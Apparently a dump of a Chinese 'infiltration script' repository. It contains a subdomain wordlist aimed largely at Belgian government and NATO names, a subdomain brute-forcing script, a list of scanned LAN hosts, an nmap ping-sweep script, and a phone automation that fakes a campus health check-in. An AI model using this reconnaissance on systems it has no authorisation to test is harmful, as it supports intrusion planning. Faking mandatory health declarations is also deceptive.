iewm 510 | ifa 511 | ifa-ofo 512 | ifaofo 513 | igvm 514 | ijhq 515 | illegale-arbeid 516 | imail 517 | imcd1 518 | imcd2 519 | imcd3 520 | inami 521 | inami-riziv 522 | inasti 523 | inasti-rsvz 524 | incc 525 | ine 526 | info-shop 527 | infogsm 528 | infomail 529 | infosec 530 | infoshop 531 | infoshopping 532 | infrastructure 533 | infrastructuur 534 | inig 535 | inpectiondesfinances 536 | inr-icn 537 | inrct 538 | inspectievanfinancien 539 | inspectiondesfinances 540 | install 541 | interieur 542 | intern 543 | interneauditthesaurie 544 | intranet 545 | investinbelgium 546 | ioot-servers 547 | ipcbel130 548 | ipcbel140 549 | iph 550 | irc 551 | iroigwy 552 | isaf 553 | isaf-hq 554 | isav 555 | ism 556 | issue-tracker 557 | issuetracker 558 | it 559 | itdel 560 | iv-inig 561 | iv-niooo 562 | ivk 563 | ivk-iev 564 | ivkiev 565 | jallc 566 | jcs 567 | jcsc 568 | jcse 569 | jcsw 570 | jemm 571 | jenner 572 | jewcs 573 | jfc-nafs 574 | jfc-napl 575 | jfcbs 576 | jfclb 577 | jfcna 578 | jfcnaples 579 | jfcnp 580 | jfnp 581 | jftc 582 | jhlb 583 | jhnsgda 584 | jobs 585 | jobsdev 586 | joot-servers 587 | juridict 588 | jurion 589 | just 590 | justice 591 | justine 592 | justitie 593 | jwc 594 | jwctf 595 | kafka 596 | kansspel 597 | kansspelcommissie 598 | kbo 599 | kbo-acc 600 | kbo-bce 601 | kbo-bce-private 602 | kbo-bce-ps 603 | kbo-bce-select 604 | kbo-bce-wi 605 | kbo-test 606 | kbopub 607 | kbopub-acc 608 | kce 609 | kce2 610 | kcenet 611 | kcetools 612 | kenniscentrum 613 | kfor 614 | kibana 615 | kim 616 | kinderbijslag 617 | klassieke-varkenspest 618 | klassiekevarkenspest 619 | kleinkasteeltje 620 | klimaat 621 | koen 622 | kommissionsglucksspiele 623 | konings-palast 624 | koningspalast 625 | koninklijk-paleis 626 | koninklijkpaleis 627 | koot-servers 628 | krantenkoppen 629 | kruispuntbank 630 | ksz 631 | ksz-bcss 632 | lab 633 | lahd 634 | lahd2 635 | lamd 636 | lancelot 637 | laruelle 638 | laurette-onkelinckx 639 | laurette-onkelinx 640 | lauretteonkelinckx 641 | lauretteonkelinx 642 | lcc14 643 | ldk 644 | lebensmittel 645 | lebensmittelsicherheit 646 | leefloon 647 | leefmilieu 648 | lesartisans 649 | lesartisans-acc 650 | likiv 651 | limosa 652 | linpha 653 | linux 654 | lists 655 | live 656 | live2 657 | lju 658 | lnc01 659 | lnc02 660 | lnc03 661 | lnc04 662 | lnc05 663 | lnc06 664 | lnc07 665 | lnc08 666 | lnc09 667 | lnc11 668 | lnc12 669 | lnc13 670 | lnc14 671 | lnc15 672 | lnc16 673 | lnc17 674 | lnc18 675 | lo 676 | log 677 | logo 678 | logos 679 | logstash 680 | lokal-polizei 681 | lokale-politie 682 | lokalepolitie 683 | lokalpolizei 684 | loot-servers 685 | lss 686 | lssplv 687 | madeliefjes 688 | magnette 689 | mail 690 | mail1 691 | mail2 692 | mailhost 693 | mailin 694 | mailsync 695 | main 696 | mainguard 697 | maladies-animales 698 | maladies-professionnelles 699 | maladiesanimales 700 | manp 701 | manw 702 | map 703 | margrietjes 704 | margueritebelge 705 | marguerites 706 | marketing 707 | mas 708 | masecu 709 | masp-be 710 | mathilde 711 | max 712 | maxima 713 | maximiliaan 714 | mazfp 715 | mcug 716 | me262 717 | meads 718 | medex 719 | mediateur-pensions 720 | mediateurpensions 721 | mediation-pension 722 | mediation-pensions 723 | mediationpension 724 | mediationpensions 725 | member 726 | members 727 | merelbeke 728 | meta 729 | metrologie 730 | metrology 731 | mibz 732 | mijnsocialezekerheid 733 | milieu 734 | miltvuur 735 | mim 736 | mineco 737 | minfin 738 | minsoc 739 | mistr 740 | mittelstand 741 | mlink1 742 | mlink2 743 | mlm-moscow 744 | mlo-belgrade 745 | mnc-ne-pl 746 | mobile 747 | mobilit 748 | mobilitaetswoche 749 | mobilitatswoche 750 | mobility 751 | mobilityweek 752 | monarchie 753 | monarchy 754 | monit 755 | moniteur 756 | moot-servers 757 | morello 758 | msiac 759 | msz 760 | mtwg 761 | mx 762 | mx1 763 | mx11 764 | mx12 765 | mx2 766 | mx3 767 | mykce 768 | naa 769 | nacesearch 770 | nacma 771 | nacmo 772 | naewfc 773 | nagsma 774 | nahema 775 | naissance 776 | naissance2 777 | nama 778 | name 779 | namsa 780 | namsacell-npc 781 | naples 782 | napma 783 | nationalregister 784 | natoschool 785 | nav 786 | navtest 787 | nc 788 | nc1s 789 | nc2s 790 | nc3a 791 | ncags 792 | ncas 793 | ncbs 794 | nchd 795 | ncirc 796 | nciss 797 | nciz 798 | nclb 799 | ncmd 800 | ncnf 801 | ncnp 802 | ncnp-dpr 803 | ncnw 804 | ncnw-fcs 805 | ncrn 806 | ncsa 807 | ncsa-1sb 808 | ndc 809 | ndss 810 | nehap 811 | net 812 | netma 813 | news 814 | ng3 815 | nhqb-mail 816 | nhqc3s 817 | nhqs 818 | nhqsa 819 | niapc 820 | nic 821 | nicc 822 | nicolas-aymeric 823 | nihdi 824 | nima 825 | nio-moscow 826 | niooo 827 | nitcdsa 828 | nitcdsa2rev2 829 | nitcdsarev2 830 | nitcnpki2rev2 831 | nitcnpkirev2 832 | nitcpki 833 | nl 834 | nlctst 835 | nmiotc 836 | nms 837 | nncc 838 | nnmc 839 | nos 840 | nova 841 | npc 842 | nr 843 | nra 844 | nrflb 845 | ns 846 | ns01 847 | ns02 848 | ns1 849 | ns2 850 | ns3 851 | nsa 852 | nshq 853 | nss 854 | ntmi-gtt 855 | ntmi-hq 856 | ntp 857 | ntserver 858 | nurc 859 | nvr 860 | obel 861 | ocamocad 862 | ocde-principesdirecteurs 863 | ocmw 864 | ocs 865 | oecd-guidelines 866 | oeffentlichendienst 867 | oeso-richtlijnen 868 | offentlichendienst 869 | offentlichendienstespensionen 870 | office 871 | ofo 872 | ofo-ifa 873 | ofoifa 874 | old 875 | oldphpfarm 876 | oldphpfarm-stag 877 | ombudsdienst-pensioen 878 | ombudsdienst-pensioenen 879 | ombudsdienst-pension 880 | ombudsdienst-pensionen 881 | ombudsdienstpensioen 882 | ombudsdienstpensioenen 883 | ombudsdienstpension 884 | ombudsdienstpensionen 885 | ombudsman 886 | ombudsman-pensioen 887 | ombudsman-pensioenen 888 | ombudsman-pensionen 889 | ombudsman-pensions 890 | ombudsman-pesion 891 | ombudsmann-pensionen 892 | ombudsmann-pensions 893 | ombudsmannpensionen 894 | ombudsmannpensions 895 | ombudsmanpensioen 896 | ombudsmanpensioenen 897 | ombudsmanpension 898 | ombudsmanpensionen 899 | ombudsmanpensions 900 | ombudsmanpesion 901 | onafts 902 | onafts-rkw 903 | onem 904 | onem-rva 905 | onerva 906 | onkelinckx 907 | onkelinx 908 | onp 909 | onp-rvp 910 | onprvp 911 | onss 912 | onssapl 913 | onssrszlss 914 | ontwikkeling 915 | ontwikkelings-samenwerking 916 | ontwikkelingssamenwerking 917 | onva 918 | onva-rjv 919 | osone 920 | ossom 921 | ossom-dosz 922 | otan 923 | outpost 924 | outsite 925 | overheidspensioenen 926 | owa 927 | p-o 928 | p51 929 | pacific 930 | palais-royal 931 | palaisroyal 932 | pan 933 | paquerette 934 | paquerettes 935 | pasteur 936 | patrimoniumdiensten 937 | pdasync 938 | pdod 939 | pdoed 940 | pdos 941 | pdos-sdpsp 942 | pegase 943 | pensioenagentschap 944 | pensioenen 945 | pensionen 946 | pensions 947 | pensionsagentur 948 | pensionspubliques 949 | peste-aviaire 950 | peste-porcine 951 | pesteaviaire 952 | pesteporcine 953 | petitchateau 954 | petrel35 955 | pgr 956 | phimail 957 | phone 958 | phpbalancer 959 | phpbalancer-stag 960 | phpmyadmin 961 | phpwf 962 | phytoweb 963 | plan 964 | plan2004 965 | plda 966 | pma 967 | po 968 | polfed 969 | police 970 | police-locale 971 | policelocale 972 | politie 973 | polizei 974 | pop 975 | pophost 976 | portaalserver 977 | portal 978 | postbox 979 | postbus 980 | postfach 981 | ppp1 982 | ppp10 983 | ppp11 984 | ppp12 985 | ppp13 986 | ppp14 987 | ppp15 988 | ppp16 989 | ppp17 990 | ppp18 991 | ppp19 992 | ppp2 993 | ppp20 994 | ppp21 995 | ppp3 996 | ppp4 997 | ppp5 998 | ppp6 999 | ppp7 1000 | ppp8 1001 | ppp9 1002 | pptp 1003 | premier 1004 | presscenter 1005 | presscentre 1006 | pressreview 1007 | princess-elisabeth 1008 | princesse-elisabeth 1009 | princesseelisabeth 1010 | princesselisabeth 1011 | princesselouise 1012 | princesslouise 1013 | prinses-elisabeth 1014 | prinseselisabeth 1015 | prinseslouise 1016 | print 1017 | printer 1018 | prinzessin-elisabeth 1019 | prinzessinelisabeth 1020 | prinzessinlouise 1021 | privacy 1022 | private-security 1023 | private-sicherheit 1024 | private-veilligheid 1025 | privatesecurity 1026 | privatesicherheit 1027 | privateveilligheid 1028 | prodcom 1029 | projects 1030 | protectioncivile 1031 | pub 1032 | public 1033 | publichealth 1034 | publicweb 1035 | quetelet 1036 | raadvanstate 1037 | raadvst 1038 | raadvst-consetat 1039 | rac-restaurants-cae 1040 | ranva 1041 | ras 1042 | raven 1043 | rcc 1044 | rce 1045 | rcn 1046 | rcs 1047 | rcw 1048 | rdb 1049 | rdb-rdg 1050 | rdg 1051 | rdg-rdb 1052 | reach 1053 | reactricity 1054 | recensement 1055 | recensement2011 1056 | recherche 1057 | reflex 1058 | regie 1059 | regiedergebouwen 1060 | regiedesbatiment 1061 | regiedesbatiments 1062 | register 1063 | registrenational 1064 | relay 1065 | relay1 1066 | reno 1067 | repository 1068 | residencepalace 1069 | resultatselectoraux 1070 | revenu-d-integration 1071 | revenu-dintegration 1072 | revenudintegration 1073 | rfid 1074 | rfid-test 1075 | rfidtest 1076 | rijksregister 1077 | riziv 1078 | riziv-inami 1079 | rjv 1080 | rjv-onva 1081 | rkw 1082 | rkw-onafts 1083 | root 1084 | route 1085 | router 1086 | royal-palace 1087 | royalpalace 1088 | rrn 1089 | rss 1090 | rssdirectory 1091 | rsvz 1092 | rsvz-inasti 1093 | rsz 1094 | rszppo 1095 | rta 1096 | rto 1097 | ruling 1098 | rva 1099 | rva-onem 1100 | rvp 1101 | rvp-onp 1102 | rvponp 1103 | saclant 1104 | saclantc 1105 | saclantcen 1106 | salmonella 1107 | salmonellose 1108 | salmonellosis 1109 | samenwerking 1110 | saml 1111 | sant01 1112 | sante 1113 | sante-publique 1114 | santepublique 1115 | saso 1116 | sav 1117 | sbib03 1118 | scdfpensions 1119 | scha01 1120 | schweinepest 1121 | sdpsp 1122 | sdpsp-pdos 1123 | search 1124 | secal 1125 | secure 1126 | secure2 1127 | securite-prive 1128 | securite-privee 1129 | securitealimentaire 1130 | securiteprive 1131 | securiteprivee 1132 | securitesociale 1133 | selor 1134 | semainedelamobilite 1135 | server 1136 | server-lnmail 1137 | serverex 1138 | services-stag 1139 | servicesdirective 1140 | servicespatrimoniaux 1141 | seveso 1142 | sfn 1143 | sgen01 1144 | sgt4 1145 | shape 1146 | shipping 1147 | shop 1148 | shop-info 1149 | shopinfo 1150 | sibelius 1151 | siem 1152 | sigedis 1153 | silberfonds 1154 | simplification 1155 | siod 1156 | sirs 1157 | siskin 1158 | sist 1159 | sjam01 1160 | skab01 1161 | slab01 1162 | slem02 1163 | slem03 1164 | sleu01 1165 | slgs01 1166 | slice 1167 | smee01 1168 | smee03 1169 | smtp 1170 | sng302 1171 | sng3lnmail1 1172 | sng3lnmail2 1173 | sng3lnmail3 1174 | sng3lnmail4 1175 | sng3lnmail5 1176 | sngslnmail1 1177 | snislnmail1 1178 | snislnmail2 1179 | snislnmail3 1180 | snislnmail4 1181 | snislnmail5 1182 | snmg1 1183 | snmp 1184 | snpl01 1185 | sobane 1186 | sociaaltarief 1187 | sociaaltarief-acc 1188 | social-assistance 1189 | socialassistance 1190 | sociale-zaken 1191 | socialeconomy 1192 | socialeeconomie 1193 | socialeverkiezingen 1194 | socialezekerheid 1195 | socialsecurity 1196 | soctar 1197 | soctar-acc 1198 | sof 1199 | sos 1200 | sos112 1201 | sozialesicherheit 1202 | sozialtarif 1203 | sp 1204 | spam 1205 | spp 1206 | sql 1207 | sql1 1208 | sql2 1209 | sql3 1210 | ssc 1211 | ssh 1212 | staatsblad 1213 | staatsrat 1214 | starfighter 1215 | statbel 1216 | stats 1217 | stcw95 1218 | stis 1219 | stor01 1220 | studentaanhetwerk 1221 | studentatwork 1222 | style 1223 | suche 1224 | supremeadministrativecourt 1225 | survey 1226 | surveykce 1227 | sw 1228 | swtc02 1229 | sylvie 1230 | syslog 1231 | ta 1232 | taalnet 1233 | taccp 1234 | taggingmanager 1235 | tarifsocial 1236 | tarifsocial-acc 1237 | tax-on-web 1238 | tax-web 1239 | taxonweb 1240 | taxweb 1241 | tct 1242 | tedc 1243 | telcobel 1244 | telerad 1245 | telnet 1246 | temporary 1247 | temporary-acc 1248 | test 1249 | test-kbo-bce-select 1250 | test2 1251 | test3 1252 | testdiv 1253 | testmark2 1254 | testncsa 1255 | tewerkstelling 1256 | tipsentrics 1257 | tmd 1258 | tourstat 1259 | tr 1260 | training 1261 | traitements 1262 | tralal 1263 | transis 1264 | transport 1265 | travail 1266 | treasury 1267 | trends 1268 | tse 1269 | tu 1270 | tularemia 1271 | tularemie 1272 | upload 1273 | urbain 1274 | urbainacc 1275 | var 1276 | varkenspest 1277 | vbv 1278 | vbv-cprr 1279 | vbvcprr 1280 | veniceclub 1281 | vereenvoudiging 1282 | verkeer 1283 | verkiezingen 1284 | verkiezingsuitslagen 1285 | vervoer 1286 | vetera 1287 | veterans 1288 | veteransandvictims 1289 | vici 1290 | victims 1291 | vigilis 1292 | voedselveiligheid 1293 | vogelgriep 1294 | vogelpest 1295 | voip 1296 | volksgesundheit 1297 | volksgezondheid 1298 | volkstelling 1299 | volkstelling2011 1300 | vpn 1301 | vpn1 1302 | vpn2 1303 | vps 1304 | vrouwenpensioen 1305 | vsp 1306 | vspp 1307 | w 1308 | wahlen 1309 | warveterans 1310 | warvictims 1311 | web 1312 | web2 1313 | webaccess 1314 | webadmin 1315 | webcache 1316 | webdev 1317 | webdiv 1318 | webgids 1319 | webguide 1320 | webibz 1321 | webinterface 1322 | webmail 1323 | webmittelstand 1324 | webserver 1325 | website 1326 | websurveys 1327 | webtranslation 1328 | webtranslations 1329 | wedden 1330 | weekvandevervoering 1331 | weekvanvervoering 1332 | werk 1333 | westlant 1334 | win 1335 | windows 1336 | workinginbelgium 1337 | ww 1338 | ww3 1339 | www 1340 | www2 1341 | wwww 1342 | xbrl 1343 | xbrl-acc 1344 | xbrl-tst 1345 | xml 1346 | xmmxprod1 1347 | zdfageh\228lter 1348 | zdfagehaelter 1349 | zdfagehalter 1350 | zdfapensionen 1351 | zensus 1352 | zensus2011 1353 | zfa 1354 | zilverfonds 1355 | zoek 1356 | 1003 1357 | 1025 1358 | 1027 1359 | 1029 1360 | 1037 1361 | 1044 1362 | 1066 1363 | 1070 1364 | 1071 1365 | 1075 1366 | 1082 1367 | 1088 1368 | 11 1369 | 1106 1370 | 1107 1371 | 1108 1372 | 1114 1373 | 1115 1374 | 1116 1375 | 112sos 1376 | 1167 1377 | 1168 1378 | 1178 1379 | 1180 1380 | 1184 1381 | 1187 1382 | 1189 1383 | 1198 1384 | 1203 1385 | 1204 1386 | 121 1387 | 1211 1388 | 1216 1389 | 131 1390 | 132 1391 | 133 1392 | 134 1393 | 135 1394 | 154 1395 | 155 1396 | 198 1397 | 2005 1398 | 214 1399 | 223 1400 | 226 1401 | 228 1402 | 232 1403 | 25 1404 | 265 1405 | 27 1406 | 270 1407 | 28 1408 | 29 1409 | 30 1410 | 30days 1411 | 33 1412 | 34 1413 | 36 1414 | 37 1415 | 417 1416 | 419 1417 | 434 1418 | 437 1419 | 448 1420 | 45 1421 | 453 1422 | 46 1423 | 475 1424 | 479 1425 | 486 1426 | 491 1427 | 50 1428 | 502 1429 | 51 1430 | 517 1431 | 528 1432 | 53 1433 | 532 1434 | 54 1435 | 541 1436 | 557 1437 | 56 1438 | 561 1439 | 593 1440 | 595 1441 | 598 1442 | 599 1443 | 605 1444 | 607 1445 | 616 1446 | 624 1447 | 625 1448 | 629 1449 | 630 1450 | 648 1451 | 664 1452 | 669 1453 | 67 1454 | 684 1455 | 7 1456 | 714 1457 | 727 1458 | 729 1459 | 731 1460 | 75 1461 | 763 1462 | 775 1463 | 79 1464 | 805 1465 | 806 1466 | 859 1467 | 861 1468 | 881 1469 | 925 1470 | 948 1471 | 951 1472 | 953 1473 | 958 1474 | 959 1475 | 96 1476 | 969 1477 | 97 1478 | 976 1479 | 977 1480 | 980 1481 | 99 1482 | 992 1483 | 996 1484 | 997 1485 | 999 1486 | RKW-ONAFTS-TEST 1487 | _sip 1488 | _spf 1489 | _tls 1490 | a 1491 | a-servers 1492 | abc 1493 | about 1494 | accept 1495 | accept-kbo-bce-select 1496 | accept-kbo-bce-wi 1497 | access 1498 | accountrequest 1499 | accounts 1500 | acg 1501 | aco 1502 | acp1 1503 | act 1504 | adl 1505 | admin 1506 | adminer 1507 | administrador 1508 | administrator 1509 | ads -------------------------------------------------------------------------------- /子域名探测/字域名探测.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import os 3 | 4 | print("--------------------------------------------------") 5 | print("+\t\t _____ ____ ____ \t\t+") 6 | print("+\t\t|__ / / ___| / ___| \t\t+") 7 | print("+\t\t / / \___ \ \___ \ \t\t+") 8 | print("+\t\t / /_ ___) | ___) |\t\t+") 9 | print("+\t\t/____|___|____/___|____/ \t\t+") 10 | print("+\t\t |_____| |_____| \t\t") 11 | print("") 12 | print("\t*自己用的信息收集子域名探测工具") 13 | print("---------------------------------------------------") 14 | domain = input("请输入要探测的域名:") 15 | 16 | headers = { # 定义User-Agent请求头,用键值对的方式 17 | "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9" 18 | } 19 | try: 20 | # 判断文件是否存在 21 | if os.path.exists('dns.txt'): 22 | save = open('dns.txt','r') 23 | else: 24 | print("不存在dns.txt字典文件!") 25 | 26 | content = save.read() 27 | subdomains = content.splitlines() 28 | 29 | for i in subdomains: 30 | url = f'http://{i}.{domain}' 31 | try: 32 | requests.get(url,headers=headers) 33 | except requests.ConnectionError: 34 | pass 35 | else: 36 | print("发现了:",url) 37 | except Exception as bc: 38 | print("出差了:"+str(bc)) -------------------------------------------------------------------------------- /存活的主机.txt: -------------------------------------------------------------------------------- 1 | 192.168.1.1 2 | 192.168.1.138 3 | 192.168.1.238 4 | 192.168.10.1 5 | 192.168.10.255 6 | 192.168.12.1 7 | 192.168.11.1 8 | 192.168.11.255 9 | 192.168.16.1 10 | 192.168.17.1 11 | 192.168.17.251 12 | 192.168.15.0 13 | 192.168.15.1 14 | 192.168.15.255 15 | 192.168.15.3 16 | 192.168.15.4 17 | 192.168.20.1 18 | 192.168.20.127 19 | 192.168.20.130 20 | 192.168.20.162 21 | 192.168.20.185 22 | 192.168.20.231 23 | 192.168.20.38 24 | 192.168.20.39 25 | 192.168.20.43 26 | 192.168.22.1 27 | 192.168.22.254 28 | 192.168.22.8 29 | 192.168.25.1 30 | 192.168.26.1 31 | 192.168.27.1 32 | 192.168.28.1 33 | 192.168.23.1 34 | 192.168.23.25 35 | 192.168.24.1 36 | 192.168.31.1 37 | 192.168.32.1 38 | 192.168.32.254 39 | 192.168.33.1 40 | 192.168.33.167 41 | 192.168.34.1 42 | 192.168.35.1 43 | 192.168.35.250 44 | 192.168.21.1 45 | 192.168.36.1 46 | 192.168.29.1 47 | 192.168.39.1 48 | 192.168.40.1 49 | 192.168.41.1 50 | 192.168.41.102 51 | 192.168.41.104 52 | 192.168.41.105 53 | 192.168.41.106 54 | 192.168.41.108 55 | 192.168.41.11 56 | 192.168.41.110 57 | 192.168.41.113 58 | 192.168.41.114 59 | 192.168.41.115 60 | 192.168.41.118 61 | 192.168.41.12 62 | 192.168.41.124 63 | 192.168.41.126 64 | 192.168.41.128 65 | 192.168.41.13 66 | 192.168.41.134 67 | 192.168.41.135 68 | 192.168.41.136 69 | 192.168.41.138 70 | 192.168.41.14 71 | 192.168.41.15 72 | 192.168.41.18 73 | 192.168.41.20 74 | 192.168.41.23 75 | 192.168.41.24 76 | 192.168.41.249 77 | 192.168.41.25 78 | 192.168.41.250 79 | 192.168.41.251 80 | 192.168.41.252 81 | 192.168.41.253 82 | 192.168.41.254 83 | 192.168.41.26 84 | 192.168.41.27 85 | 192.168.41.28 86 | 192.168.41.32 87 | 192.168.41.33 88 | 192.168.41.36 89 | 192.168.41.37 90 | 192.168.41.38 91 | 192.168.41.40 92 | 192.168.41.41 93 | 192.168.41.42 94 | 192.168.41.43 95 | 192.168.41.44 96 | 192.168.41.45 97 | 192.168.41.46 98 | 192.168.41.51 99 | 192.168.41.55 100 | 192.168.41.56 101 | 192.168.41.57 102 | 192.168.41.58 103 | 192.168.41.59 104 | 192.168.41.6 105 | 192.168.41.60 106 | 192.168.41.63 107 | 192.168.41.66 108 | 192.168.41.98 109 | 192.168.42.1 110 | 192.168.43.1 111 | 192.168.44.1 112 | 192.168.37.1 113 | 192.168.38.1 114 | 192.168.38.250 115 | 192.168.51.1 116 | 192.168.51.143 117 | 192.168.51.231 118 | 192.168.51.232 119 | 192.168.51.238 120 | 192.168.51.239 121 | 192.168.61.1 122 | 192.168.61.238 123 | 192.168.61.255 124 | 192.168.64.1 125 | 192.168.64.231 126 | 192.168.64.235 127 | 192.168.64.236 128 | 192.168.64.239 129 | 192.168.71.1 130 | 192.168.71.221 131 | 192.168.71.222 132 | 192.168.71.223 133 | 192.168.71.224 134 | 192.168.71.225 135 | 192.168.71.226 136 | 192.168.71.227 137 | 192.168.71.228 138 | 192.168.71.229 139 | 192.168.71.240 140 | 192.168.71.241 141 | 192.168.71.242 142 | 192.168.71.247 143 | 192.168.71.249 144 | 192.168.80.1 145 | 192.168.80.10 146 | 192.168.80.100 147 | 192.168.80.101 148 | 192.168.80.102 149 | 192.168.80.103 150 | 192.168.80.104 151 | 192.168.80.105 152 | 192.168.80.106 153 | 192.168.80.107 154 | 192.168.80.108 155 | 192.168.80.11 156 | 192.168.80.110 157 | 192.168.80.111 158 | 192.168.80.112 159 | 192.168.80.114 160 | 192.168.80.116 161 | 192.168.80.117 162 | 192.168.80.118 163 | 192.168.80.119 164 | 192.168.80.12 165 | 192.168.80.121 166 | 192.168.80.122 167 | 192.168.80.124 168 | 192.168.80.125 169 | 192.168.80.127 170 | 192.168.80.128 171 | 192.168.80.13 172 | 192.168.80.14 173 | 192.168.80.15 174 | 192.168.80.151 175 | 192.168.80.152 176 | 192.168.80.153 177 | 192.168.80.154 178 | 192.168.80.16 179 | 192.168.80.17 180 | 192.168.80.170 181 | 192.168.80.171 182 | 192.168.80.172 183 | 192.168.80.18 184 | 192.168.80.19 185 | 192.168.80.20 186 | 192.168.80.21 187 | 192.168.80.22 188 | 192.168.80.23 189 | 192.168.80.230 190 | 192.168.80.24 191 | 192.168.80.25 192 | 192.168.80.26 193 | 192.168.80.27 194 | 192.168.80.28 195 | 192.168.80.29 196 | 192.168.80.3 197 | 192.168.80.30 198 | 192.168.80.31 199 | 192.168.80.32 200 | 192.168.80.33 201 | 192.168.80.34 202 | 192.168.80.35 203 | 192.168.80.38 204 | 192.168.80.39 205 | 192.168.80.4 206 | 192.168.80.40 207 | 192.168.80.41 208 | 192.168.80.5 209 | 192.168.80.51 210 | 192.168.80.52 211 | 192.168.80.53 212 | 192.168.80.54 213 | 192.168.80.55 214 | 192.168.80.56 215 | 192.168.80.57 216 | 192.168.80.58 217 | 192.168.80.59 218 | 192.168.80.6 219 | 192.168.80.60 220 | 192.168.80.61 221 | 192.168.80.62 222 | 192.168.80.63 223 | 192.168.80.64 224 | 192.168.80.65 225 | 192.168.80.66 226 | 192.168.80.67 227 | 192.168.80.68 228 | 192.168.80.69 229 | 192.168.80.7 230 | 192.168.80.70 231 | 192.168.80.71 232 | 192.168.80.72 233 | 192.168.80.73 234 | 192.168.80.74 235 | 192.168.80.75 236 | 192.168.80.78 237 | 192.168.80.79 238 | 192.168.80.8 239 | 192.168.80.81 240 | 192.168.80.9 241 | 192.168.80.93 242 | 192.168.80.95 243 | 192.168.80.97 244 | 192.168.80.98 245 | 192.168.80.99 246 | 192.168.91.1 247 | 192.168.92.1 248 | 192.168.93.1 249 | 192.168.94.1 250 | 192.168.95.1 251 | 192.168.130.1 252 | 192.168.130.110 253 | 192.168.130.12 254 | 192.168.131.1 255 | 192.168.143.1 256 | 192.168.142.1 257 | 192.168.142.255 258 | 192.168.141.1 259 | 192.168.144.1 260 | 192.168.145.1 261 | 192.168.146.1 262 | 192.168.147.1 263 | 192.168.148.1 264 | 192.168.153.1 265 | 192.168.154.1 266 | 192.168.152.1 267 | 192.168.152.15 268 | 192.168.157.1 269 | 192.168.155.1 270 | 192.168.161.1 271 | 192.168.156.1 272 | 192.168.156.255 273 | 192.168.151.1 274 | 192.168.151.255 275 | 192.168.250.1 276 | 192.168.251.1 277 | 192.168.252.1 278 | 172.17.0.1 279 | -------------------------------------------------------------------------------- /完美校园自动健康打卡脚本/.screenshot2021-1001_19-24-06-472558.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CuriousLearnerDev/Infiltration_script/898fff356c58f143b15f4f647fedcfca9ed72e88/完美校园自动健康打卡脚本/.screenshot2021-1001_19-24-06-472558.png -------------------------------------------------------------------------------- /完美校园自动健康打卡脚本/.screenshot2021-1001_19-26-21-361662.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CuriousLearnerDev/Infiltration_script/898fff356c58f143b15f4f647fedcfca9ed72e88/完美校园自动健康打卡脚本/.screenshot2021-1001_19-26-21-361662.png -------------------------------------------------------------------------------- /完美校园自动健康打卡脚本/mian.py: -------------------------------------------------------------------------------- 1 | import uiautomator2 as u2 2 | import time 3 | import random 4 | 5 | 6 | d = u2.connect('192.168.0.102:5555') #需要adb打开手机的端口 7 | 8 | 9 | print(d.info) # check connection 10 | print("远程连接手机成功") 11 | def ydk(): 12 | d.click(0.547, 0.684) 13 | print("正在打字") 14 | d.click(0.515, 0.961) 15 | d.click(0.547, 0.684) 16 | d.click(0.291, 0.758) 17 | d.click(0.786, 0.762) 18 | d.click(0.103, 0.633) 19 | print("打字完成") 20 | time.sleep(2) 21 | print("发信息") 22 | d.click(0.899, 0.533) 23 | 24 | print("发送成功") 25 | print("正在关闭屏幕") 26 | d.screen_off() 27 | print("成功关闭屏幕") 28 | 29 | def douyin(): 30 | 31 | # 32 | time.sleep(2) 33 | d.screen_on()# 打开屏幕 34 | d.swipe(313,1370,313,110) 35 | print("准备打开屏幕") 36 | time.sleep(2) 37 | print("正在手机解锁") 38 | d.click(0.504, 0.511) 39 | 40 | d.click(0.498, 0.754) 41 | 42 | d.click(0.498, 0.754) 43 | d.click(0.504, 0.511) 44 | d.click(0.227, 0.521) 45 | 46 | d.click(0.504, 0.511) 47 | d.click(0.775, 0.51) 48 | 49 | d.click(0.498, 0.754) 50 | time.sleep(2) 51 | print("准备完美校园") 52 | d(text="完美校园").click() 53 | d.click(0.372, 0.328) 54 | time.sleep(2) 55 | time.sleep(2) 56 | print("正在屏幕滑动") 57 | d.swipe(313,1370,313,110) 58 | 59 | print("正在屏幕滑动") 60 | d.swipe(313,1370,313,110) 61 | 62 | print("正在屏幕滑动") 63 | d.swipe(313,1370,313,110) 64 | print("正在屏幕滑动") 65 | d.swipe(313,1370,313,110) 66 | 67 | print("正在屏幕滑动") 68 | d.swipe(313,1370,313,110) 69 | print("正在屏幕滑动") 70 | d.swipe(313, 1370, 313, 110) 71 | print("正在屏幕滑动") 72 | d.swipe(313, 1370, 313, 110) 73 | print("点击提交") 74 | d.click(0.478, 0.931) 75 | 76 | print("确定提交") 77 | d.click(0.708, 0.777) 78 | 79 | print("返回主页") 80 | d.press("home") 81 | 82 | print("找寻QQ") 83 | d.click(0.449, 0.787) 84 | print("打开QQ") 85 | d(text="QQ").click() 86 | time.sleep(5) 87 | print("找寻打卡群") 88 | d.click(0.394, 0.34) 89 | ydk() 90 | 91 | if __name__=='__main__': 92 | douyin() -------------------------------------------------------------------------------- /局域网扫描/cs.py: -------------------------------------------------------------------------------- 1 | import nmap 2 | import threading 3 | import time 4 | import queue 5 | 6 | 7 | 8 | # 提取出来的结果保存起来 9 | def Searchresults(results_IP): 10 | Searchresults_document = open("存活的主机.txt", 'a', encoding='utf-8') # 打开文件写的方式 11 | Searchresults_document.write((results_IP+'\n')) # 写入 12 | Searchresults_document.close() # 关闭文件 13 | 14 | 15 | def scan(IP_range): 16 | 17 | while not IP_range.empty(): 18 | ip=IP_range.get() 19 | print(f"当前正在探测:{ip}") 20 | nm = nmap.PortScanner() 21 | nm.scan(hosts=ip,arguments = '-sP') 22 | 23 | hosts_list=[(x,nm[x]['status']['state']) for x in nm.all_hosts()] 24 | 25 | for host,status in hosts_list: 26 | 27 | print(f"{host}---{status}") 28 | 29 | Searchresults(host) 30 | 31 | def cs(IP_range): 32 | print(IP_range) 33 | time.sleep(1) # 暂停 1 秒 34 | 35 | def Thread(IP_range): 36 | threadpool = [] 37 | for _ in range(int(10)): 38 | Threads = threading.Thread(target=scan, args=(IP_range,)) 39 | threadpool.append(Threads) 40 | for th in threadpool: 41 | th.start() 42 | for th in threadpool: 43 | threading.Thread.join(th) 44 | 45 | if __name__ == '__main__': 46 | IP_192_range=[''] 47 | IP_172_range=[''] 48 | IP_10_2_range=[''] 49 | IP_10_1_range=[''] 50 | for i1 in range(77,256): 